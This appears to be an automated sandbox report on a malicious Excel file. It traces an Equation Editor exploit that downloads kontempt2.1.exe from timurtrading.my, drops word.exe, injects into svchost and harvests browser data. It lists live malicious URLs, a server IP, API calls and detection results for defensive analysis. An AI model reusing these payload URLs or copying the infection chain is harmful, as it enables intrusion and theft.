Source: EQNEDT32.EXE, 00000002.00000002.427177451.000000000061F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://timurtrading.my/kontempt2.1.exee
Source: EQNEDT32.EXE, 00000002.00000003.426323426.0000000000696000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.427203634.00000000006A2000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.427059690.000000000069D000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.427104570.00000000006A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: EQNEDT32.EXE, 00000002.00000003.426323426.0000000000696000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.427203634.00000000006A2000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.427059690.000000000069D000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.427104570.00000000006A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: uAjPOONiWk.exe, 00000009.00000002.639998204.0000000005095000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.jilifish.win
Source: uAjPOONiWk.exe, 00000009.00000002.639998204.0000000005095000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.jilifish.win/to3j/
Source: msinfo32.exe, 00000008.00000002.640641688.0000000061ED1000.00000008.00000001.01000000.00000008.sdmp, sqlite3.dll.8.drString found in binary or memory: http://www.sqlite.org/copyright.html.
Source: msinfo32.exe, 00000008.00000003.540875935.000000000038E000.00000004.00000020.00020000.00000000.sdmp, 7yj1259-.8.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: msinfo32.exe, 00000008.00000003.540875935.000000000038E000.00000004.00000020.00020000.00000000.sdmp, 7yj1259-.8.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: msinfo32.exe, 00000008.00000003.540875935.000000000038E000.00000004.00000020.00020000.00000000.sdmp, 7yj1259-.8.drString found in binary or memory: https://duckduckgo.com/ac/?q=
Source: msinfo32.exe, 00000008.00000003.540875935.000000000038E000.00000004.00000020.00020000.00000000.sdmp, 7yj1259-.8.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: msinfo32.exe, 00000008.00000003.540875935.000000000038E000.00000004.00000020.00020000.00000000.sdmp, 7yj1259-.8.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: msinfo32.exe, 00000008.00000003.540875935.000000000038E000.00000004.00000020.00020000.00000000.sdmp, 7yj1259-.8.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: msinfo32.exe, 00000008.00000003.540875935.000000000038E000.00000004.00000020.00020000.00000000.sdmp, 7yj1259-.8.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: EQNEDT32.EXE, 00000002.00000003.426323426.0000000000696000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.427203634.00000000006A2000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.427059690.000000000069D000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.427104570.00000000006A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
Source: msinfo32.exe, 00000008.00000003.541112304.0000000005F7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: EQNEDT32.EXE, 00000002.00000003.427086448.0000000000650000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.427188921.0000000000651000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://timurtrading.my/
Source: EQNEDT32.EXE, 00000002.00000002.427203634.00000000006DC000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.427177451.000000000061F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.427059690.00000000006DC000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.426323426.00000000006DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://timurtrading.my/kontempt2.1.exe
Source: EQNEDT32.EXE, 00000002.00000002.427177451.000000000061F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://timurtrading.my/kontempt2.1.exec
Source: EQNEDT32.EXE, 00000002.00000002.427177451.000000000061F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://timurtrading.my/kontempt2.1.exeppC:
Source: EQNEDT32.EXE, 00000002.00000002.427203634.00000000006DC000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.427059690.00000000006DC000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.426323426.00000000006DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://timurtrading.my/kontempt2.1.exeroC:
Source: 7yj1259-.8.drString found in binary or memory: https://www.google.com/favicon.ico
Source: unknown | Network traffic detected: HTTP traffic on port 49162 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49162
Source: unknown | HTTPS traffic detected: 192.3.255.145:443 -> 192.168.2.22:49162 version: TLS 1.2
Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_0046C5D0 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard
Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_00459FFF OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_00456354 GetCursorPos,ScreenToClient,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetWindowLongW
Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_0047C08E SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW

System Summary

Source: sheet1.xml, type: SAMPLE | Matched rule: detects AutoLoad documents using LegacyDrawing Author: ditekSHen
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Roaming\word.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\kontempt2.1[1].exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Memory allocated: 770B0000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\word.exe | Memory allocated: 770B0000 page execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe | Memory allocated: 770B0000 page execute and read and write
Source: C:\Windows\SysWOW64\msinfo32.exe | Memory allocated: 770B0000 page execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_0042C623 NtClose
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_008807AC NtCreateMutant,LdrInitializeThunk
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_0087F9F0 NtClose,LdrInitializeThunk
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_0087FAE8 NtQueryInformationProcess,LdrInitializeThunk
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_0087FB68 NtFreeVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_0087FDC0 NtQuerySystemInformation,LdrInitializeThunk
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_008800C4 NtCreateFile
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_00880048 NtProtectVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_00880060 NtQuerySection
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_00880078 NtResumeThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_008801D4 NtSetValueKey
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_0088010C NtOpenDirectoryObject
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_00880C40 NtGetContextThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_008810D0 NtOpenProcessToken
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_00881148 NtOpenThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_0087F8CC NtWaitForSingleObject
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_0087F900 NtReadFile
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_00881930 NtSetContextThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_0087F938 NtWriteFile
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_0087FAB8 NtQueryValueKey
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_0087FAD0 NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_0087FA20 NtQueryInformationFile
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_0087FA50 NtEnumerateValueKey
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_0087FBB8 NtQueryInformationToken
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_0087FBE8 NtQueryVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_0087FB50 NtCreateKey
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_0087FC90 NtUnmapViewOfSection
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_0087FC30 NtOpenProcess
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_0087FC48 NtSetInformationFile
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_0087FC60 NtMapViewOfSection
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_00881D80 NtSuspendThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_0087FD8C NtDelayExecution
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_0087FD5C NtEnumerateKey
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_0087FEA0 NtReadVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_0087FED0 NtAdjustPrivilegesToken
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_0087FE24 NtWriteVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_0087FFB4 NtCreateSection
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_0087FFFC NtCreateProcessEx
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_0087FF34 NtQueueApcThread
Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_00434D50: GetFullPathNameW,__swprintf,_wcslen,_wcslen,_wcslen,CreateDirectoryW,CreateFileW,_memset,_wcslen,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle
Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_004461ED _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_004364AA GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState
Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_00409A40
Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_00412038
Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_0047E1FA
Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_0041A46B
Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_0041240C
Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_00446566
Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_004045E0
Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_00412818
Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_0047CBF0
Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_00412C38
Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_00490D70
Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_00424F70
Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_0041AF0D
Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_00427161
Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_004212BE
Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_00443390
Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_00443391
Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_0041D750
Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_004037E0
Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_00427859
Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_0040F890
Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_0042397B
Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_00411B63
Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_00423EBF
Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_03A46798
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_004185E3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_00416823
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_00403090
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_00410093
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_0040E113
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_004011F0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_00402390
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_00402BAE
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_0042EC63
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_0040FE6A
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_0040FE73
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_004026F0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_0088E0C6
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_0088E2E9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_009363BF
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_008B63DB
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_00892305
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_008DA37B
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_0091443E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_009105E3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_008AC5F0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_008D6540
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_00894680
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_0089E6C1
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_00932622
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_008DA634
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_0089C7BC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_0089C85C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_008B286D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_0093098E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_008929B2
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_009249F5
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_008A69FE
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_008DC920
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_0093CBA4
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_00916BCB
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_00932C9C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_0091AC5E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_008C0D3B
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_0089CD5B
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_008C2E2F
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_008AEE4C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_0092CFB1
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_00902FDC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_008A0F3F
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_008BD005
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_00893040
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_008A905A
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_0090D06D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_0091D13F
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_00931238
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_0088F3CF
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_00897353
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_008A1489
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_008C5485
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_008CD47D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_009335DA
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_0089351F
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_0091579A
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_008C57C3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_0092771D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_0090F8C4
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_0092F8EE
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_00915955
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_0091394B
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_00943A83
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_0091DBDA
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_0088FBD7
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_008B7B00
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_0092FDDD
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_0091BF14
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_008BDF7C
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 8_2_61EAB6F3
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 8_2_61E941FB
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 8_2_61E1519A
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 8_2_61E530C0
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 8_2_61E213FB
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 8_2_61E88325
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 8_2_61E4B559
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 8_2_61E8B53E
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 8_2_61E1853F
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 8_2_61E874E5
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 8_2_61E10721
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 8_2_61E556B7
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 8_2_61E3782E
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 8_2_61E4CBB1
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 8_2_61E52B5D
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 8_2_61E31CF8
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 8_2_61E1EC49
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 8_2_61E1DC2C
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 8_2_61E25C1C
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 8_2_61E4FEA8
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\sqlite3.dll A15FD84EE61B54C92BB099DFB78226548F43D550C67FB6ADF4CCE3D064AB1C14
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 008D3F92 appears 132 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 008D373B appears 253 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 008FF970 appears 84 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 0088E2A8 appears 60 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 0088DF5C appears 137 times
Source: C:\Users\user\AppData\Roaming\word.exe | Code function: String function: 00445975 appears 65 times
Source: C:\Users\user\AppData\Roaming\word.exe | Code function: String function: 0041171A appears 37 times
Source: C:\Users\user\AppData\Roaming\word.exe | Code function: String function: 0041718C appears 45 times
Source: C:\Users\user\AppData\Roaming\word.exe | Code function: String function: 0040E6D0 appears 35 times
Source: sqlite3.dll.8.dr | Static PE information: Number of sections : 18 > 10
Source: C:\Windows\SysWOW64\msinfo32.exe | Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\52.0.1 (x86 en-US)\Main Install Directory
Source: sheet1.xml, type: SAMPLE | Matched rule: INDICATOR_XML_LegacyDrawing_AutoLoad_Document author = ditekSHen, description = detects AutoLoad documents using LegacyDrawing
Source: classification engine | Classification label: mal100.troj.spyw.expl.evad.winXLSX@10/10@7/6
Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_0044AF5C GetLastError,FormatMessageW
Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_00464422 OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle
Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_0045D517 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode
Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_0043701F CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,__wcsicoll,CloseHandle
Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_0047A999 OleInitialize,CLSIDFromProgID,CoCreateInstance,CoInitializeSecurity,_memset,_wcslen,_memset,CoCreateInstanceEx,CoSetProxyBlanket
Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_0043614F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Desktop\~$IND24072113.xlsx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRA39E.tmp
Source: IND24072113.xlsx | OLE indicator, Workbook stream: true
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File read: C:\Users\desktop.ini
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\msinfo32.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: msinfo32.exe, 00000008.00000002.640596443.0000000061EB5000.00000002.00000001.01000000.00000008.sdmp, sqlite3.dll.8.dr | Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: msinfo32.exe, 00000008.00000002.640596443.0000000061EB5000.00000002.00000001.01000000.00000008.sdmp, sqlite3.dll.8.dr | Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: msinfo32.exe, 00000008.00000002.640596443.0000000061EB5000.00000002.00000001.01000000.00000008.sdmp, sqlite3.dll.8.dr | Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: msinfo32.exe, 00000008.00000002.640596443.0000000061EB5000.00000002.00000001.01000000.00000008.sdmp, sqlite3.dll.8.dr | Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: msinfo32.exe, 00000008.00000002.640596443.0000000061EB5000.00000002.00000001.01000000.00000008.sdmp, sqlite3.dll.8.dr | Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: msinfo32.exe, 00000008.00000002.640596443.0000000061EB5000.00000002.00000001.01000000.00000008.sdmp, sqlite3.dll.8.dr | Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: msinfo32.exe, 00000008.00000002.640596443.0000000061EB5000.00000002.00000001.01000000.00000008.sdmp, sqlite3.dll.8.dr | Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: msinfo32.exe, 00000008.00000002.640596443.0000000061EB5000.00000002.00000001.01000000.00000008.sdmp, sqlite3.dll.8.dr | Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: msinfo32.exe, 00000008.00000002.640596443.0000000061EB5000.00000002.00000001.01000000.00000008.sdmp, sqlite3.dll.8.dr | Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: IND24072113.xlsx | ReversingLabs: Detection: 68%
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\user\AppData\Roaming\word.exe C:\Users\user\AppData\Roaming\word.exe
Source: C:\Users\user\AppData\Roaming\word.exe | Process created: C:\Windows\SysWOW64\svchost.exe C:\Users\user\AppData\Roaming\word.exe
Source: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exe | Process created: C:\Windows\SysWOW64\msinfo32.exe "C:\Windows\SysWOW64\msinfo32.exe"
Source: C:\Windows\SysWOW64\msinfo32.exe | Process created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe"
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: wow64win.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: wow64cpu.dll
